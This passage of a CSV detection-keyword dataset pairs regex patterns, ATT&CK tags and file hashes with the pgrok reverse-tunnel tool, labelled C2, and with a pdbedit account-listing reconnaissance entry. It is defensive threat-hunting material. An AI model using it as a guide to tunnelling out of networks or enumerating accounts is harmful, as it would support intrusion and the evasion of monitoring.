It causes pdbedit to list the users in the database - printing out the account fields in a descriptive format","T1003.003 - T1087.001","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "* install pgrok*",".{0,1000}\sinstall\spgrok.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "* pgrok.exe*",".{0,1000}\spgrok\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","0","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z" "* pgrokd.exe*",".{0,1000}\spgrokd\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","0","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z" "*/app/pgrokd/*",".{0,1000}\/app\/pgrokd\/.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*/pgrok.exe*",".{0,1000}\/pgrok\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","1","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z" "*/pgrok.git*",".{0,1000}\/pgrok\.git.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","1","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*/pgrok.yml*",".{0,1000}\/pgrok\.yml.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*/pgrokd.exe*",".{0,1000}\/pgrokd\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","1","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z" "*/pgrokd.yml",".{0,1000}\/pgrokd\.yml","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*/pgrokd_*.zip*",".{0,1000}\/pgrokd_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","1","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*/var/opt/pgrokd*",".{0,1000}\/var\/opt\/pgrokd.{0,1000}","greyware_tool_keyword","pgrok","Poor 
man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*\pgrok.exe*",".{0,1000}\\pgrok\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","0","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z" "*\pgrok.yml*",".{0,1000}\\pgrok\.yml.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*\pgrokd.exe*",".{0,1000}\\pgrokd\.exe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/jerson/pgrok","1","0","N/A","N/A","10","10","281","54","2022-05-30T14:53:46Z","2019-07-31T13:23:51Z" "*\pgrokd.yml",".{0,1000}\\pgrokd\.yml","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*\pgrokd_*.zip*",".{0,1000}\\pgrokd_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - 
TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*>Poor man's ngrok<*",".{0,1000}\>Poor\sman\'s\sngrok\<.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","N/A","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*00440c4525e995e54ce65e9d0c85f7482136463c9109c61650687226aca149bc*",".{0,1000}00440c4525e995e54ce65e9d0c85f7482136463c9109c61650687226aca149bc.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*068793abf6b6c18bfcc9f22207b12de7f25d922960cd5b48e3547851216bc456*",".{0,1000}068793abf6b6c18bfcc9f22207b12de7f25d922960cd5b48e3547851216bc456.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*073f9b935fa7e67e49cdd53823955c3ec8291fefcc39516f88ac57e2dd9131a1*",".{0,1000}073f9b935fa7e67e49cdd53823955c3ec8291fefcc39516f88ac57e2dd9131a1.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*0c20cf6d65d5dfc9f36005813dc82517043fd635cbb571aa1c1039d3cd5161ec*",".{0,1000}0c20cf6d65d5dfc9f36005813dc82517043fd635cbb571aa1c1039d3cd5161ec.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*0fc8c8a3c45bf30f1f09ae9c74e8986c367958d81ba2001c23ee536ca0227fbe*",".{0,1000}0fc8c8a3c45bf30f1f09ae9c74e8986c367958d81ba2001c23ee536ca0227fbe.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*1079079045b66cde89827c0129aff180ad2d67fda71415164a2a3e98f37c40e7*",".{0,1000}1079079045b66cde89827c0129aff180ad2d67fda71415164a2a3e98f37c40e7.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*116fae615a600632bd007ea8608b2c814c55a02324f9b8cdd75e63e2b71d53ba*",".{0,1000}116fae615a600632bd007ea8608b2c814c55a02324f9b8cdd75e63e2b71d53ba.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*11f6bee5589f447de6fa74890630deb8fc33cae47fdf31907b705a05a27e39b5*",".{0,1000}11f6bee5589f447de6fa74890630deb8fc33cae47fdf31907b705a05a27e39b5.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*17db2b8cf5cb903ef0b04dc10dfa5f24fd9ce7ec75674219f322b15d706935eb*",".{0,1000}17db2b8cf5cb903ef0b04dc10dfa5f24fd9ce7ec75674219f322b15d706935eb.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*1fe3604bdf69ff5a881a77258a10583a3fea5958aaab958ee4c22080635f64ba*",".{0,1000}1fe3604bdf69ff5a881a77258a10583a3fea5958aaab958ee4c22080635f64ba.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*22415883e18cde6e909ddcf683ded67fa419a726557f7124636f980e64b04576*",".{0,1000}22415883e18cde6e909ddcf683ded67fa419a726557f7124636f980e64b04576.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*2b92a08a76d9b0e13e41660fdc2491eaeda7b8400f9d29542f27ad2edd004d9f*",".{0,1000}2b92a08a76d9b0e13e41660fdc2491eaeda7b8400f9d29542f27ad2edd004d9f.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*2bf454abbd1446061cac6ee9f57b12c572c07a3093e45e29b0cdc088ab18238e*",".{0,1000}2bf454abbd1446061cac6ee9f57b12c572c07a3093e45e29b0cdc088ab18238e.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*2eb58b8d72bebd6f4ca4d55ac855dae5dd7f29b825ad14aba8e4a96e19c5ae54*",".{0,1000}2eb58b8d72bebd6f4ca4d55ac855dae5dd7f29b825ad14aba8e4a96e19c5ae54.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*31dc3fe53dd1ad80d2c5e6ffa9221b62385b1cd2f16ecc240cd59e5f485155cd*",".{0,1000}31dc3fe53dd1ad80d2c5e6ffa9221b62385b1cd2f16ecc240cd59e5f485155cd.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*349d0d0ecabf954caa8a1a78ab35b16bbc625424e827e008db1c76fd4bd29dc5*",".{0,1000}349d0d0ecabf954caa8a1a78ab35b16bbc625424e827e008db1c76fd4bd29dc5.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*35d6b2ef9a31b54ebee2a29bf22bb623bb5c9a74110472268581d6ea8122132c*",".{0,1000}35d6b2ef9a31b54ebee2a29bf22bb623bb5c9a74110472268581d6ea8122132c.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*3892f45ccf44d24fbe3b48933a876414e79e8e9a35f3924ef2dd1c63053f4656*",".{0,1000}3892f45ccf44d24fbe3b48933a876414e79e8e9a35f3924ef2dd1c63053f4656.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*3da0eb5c83daa77c9e52759d3b668774b0bccbe16b87c74301ec08979ffb15d4*",".{0,1000}3da0eb5c83daa77c9e52759d3b668774b0bccbe16b87c74301ec08979ffb15d4.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*3f06328ca39cad23ca718129de65b24c3630dbc51fb473b42405c18a23e21992*",".{0,1000}3f06328ca39cad23ca718129de65b24c3630dbc51fb473b42405c18a23e21992.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*4071819358aab734ff8346fa8540427d3735d964d636af6a803f84433e9ca03a*",".{0,1000}4071819358aab734ff8346fa8540427d3735d964d636af6a803f84433e9ca03a.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*43c68bdc9adf3cea7c3643492732aac7e8731d0abd50fdeab1f9b078801d41a8*",".{0,1000}43c68bdc9adf3cea7c3643492732aac7e8731d0abd50fdeab1f9b078801d41a8.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*46d4423a5cf1811ceb701cd756aa94bcc6d53a3c4ca49d961a4fd2b2a75ab300*",".{0,1000}46d4423a5cf1811ceb701cd756aa94bcc6d53a3c4ca49d961a4fd2b2a75ab300.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*47fd3fa87768d26e5e71cd73d507d5faf8ec898ead1ec46487e54c8e0ed63838*",".{0,1000}47fd3fa87768d26e5e71cd73d507d5faf8ec898ead1ec46487e54c8e0ed63838.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*48a3acd3b29c436bb696a1486128fa509bd08323eadafb8c7dad54882b45b8f4*",".{0,1000}48a3acd3b29c436bb696a1486128fa509bd08323eadafb8c7dad54882b45b8f4.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*4973faa197eedbe906929425c2f85a2f29411fd84e1b0599e4951c07fe5f37be*",".{0,1000}4973faa197eedbe906929425c2f85a2f29411fd84e1b0599e4951c07fe5f37be.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*4aa6c882ba3b5d8a4a62f183f4ea878a9d86dda8e6713c44f0bb16528bc124df*",".{0,1000}4aa6c882ba3b5d8a4a62f183f4ea878a9d86dda8e6713c44f0bb16528bc124df.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*51ae744086e74f4266459e4fec04b65386dce95598a87b961398f85119bbf701*",".{0,1000}51ae744086e74f4266459e4fec04b65386dce95598a87b961398f85119bbf701.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*53cb0a4c9d99d9fa9ceb83bc5fe6ac1f8f7100130b1597d9eb71b3a9fdb01fcd*",".{0,1000}53cb0a4c9d99d9fa9ceb83bc5fe6ac1f8f7100130b1597d9eb71b3a9fdb01fcd.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*5579149600842ad916cf87ca07c8b8fd81b4a5737d28ba2c66b1e2c72a8cf036*",".{0,1000}5579149600842ad916cf87ca07c8b8fd81b4a5737d28ba2c66b1e2c72a8cf036.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*57ec0021464f26379ee9242f6b517b4276fb7e431cd963df8950dcec8c83d6ba*",".{0,1000}57ec0021464f26379ee9242f6b517b4276fb7e431cd963df8950dcec8c83d6ba.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*5829a7b027c1fe0c12ba6e6fa4e53e8d21c94de346c0c3919a73da2565561979*",".{0,1000}5829a7b027c1fe0c12ba6e6fa4e53e8d21c94de346c0c3919a73da2565561979.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*5b5327952836163d6a5c2a9ae0d300daebcae8b8066fd2cebf1e3907ccb0b3fd*",".{0,1000}5b5327952836163d6a5c2a9ae0d300daebcae8b8066fd2cebf1e3907ccb0b3fd.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*5e2b755a50d007fc6f5807bae412ea3d35ca448bda47423e0f80a3692e3455a6*",".{0,1000}5e2b755a50d007fc6f5807bae412ea3d35ca448bda47423e0f80a3692e3455a6.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*5f712eb517e8d795f053d28f443cddea953a0bfa339f78eed68a1c01566d84d3*",".{0,1000}5f712eb517e8d795f053d28f443cddea953a0bfa339f78eed68a1c01566d84d3.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*62dca9e606b8d8c2a1379e791210dece010cd801912d588dbbf3859d00a821da*",".{0,1000}62dca9e606b8d8c2a1379e791210dece010cd801912d588dbbf3859d00a821da.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*63ccc3e608d3225793b40e643af2115811668731a2b43cbf5217bfb3d7e01d84*",".{0,1000}63ccc3e608d3225793b40e643af2115811668731a2b43cbf5217bfb3d7e01d84.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*6fec9d5af24c2d845ab1e2146e38196ae9a8ae351442c6fb8a048373befd88d8*",".{0,1000}6fec9d5af24c2d845ab1e2146e38196ae9a8ae351442c6fb8a048373befd88d8.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*763ca50b38753d213fa1c4b3d447ad0b7f595e9251f5471be04c6dae3a034308*",".{0,1000}763ca50b38753d213fa1c4b3d447ad0b7f595e9251f5471be04c6dae3a034308.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
"*78db6e175aac64df82c8c51798da5dcedeb82559fa7cdcc489a718f87c385203*",".{0,1000}78db6e175aac64df82c8c51798da5dcedeb82559fa7cdcc489a718f87c385203.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*79ae34d44a22c9c5e7f1eb1d60fc19e8ab43120cdf0852d8e17ea62ee39669ac*",".{0,1000}79ae34d44a22c9c5e7f1eb1d60fc19e8ab43120cdf0852d8e17ea62ee39669ac.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*7a75ffa6b95556dfc5841eed63d45ad41eb495c0da386aa4f61ddf209a529075*",".{0,1000}7a75ffa6b95556dfc5841eed63d45ad41eb495c0da386aa4f61ddf209a529075.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" "*7be3968468ba873800b67376c017a529418f1aa250f65577776b9630641f2468*",".{0,1000}7be3968468ba873800b67376c017a529418f1aa250f65577776b9630641f2468.{0,1000}","greyware_tool_keyword","pgrok","Poor man's ngrok - a multi-tenant HTTP/TCP reverse tunnel solution through SSH remote port forwarding","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/pgrok/pgrok","1","0","#filehash","N/A","10","10","3151","102","2024-08-02T05:15:20Z","2023-03-08T12:43:55Z" 
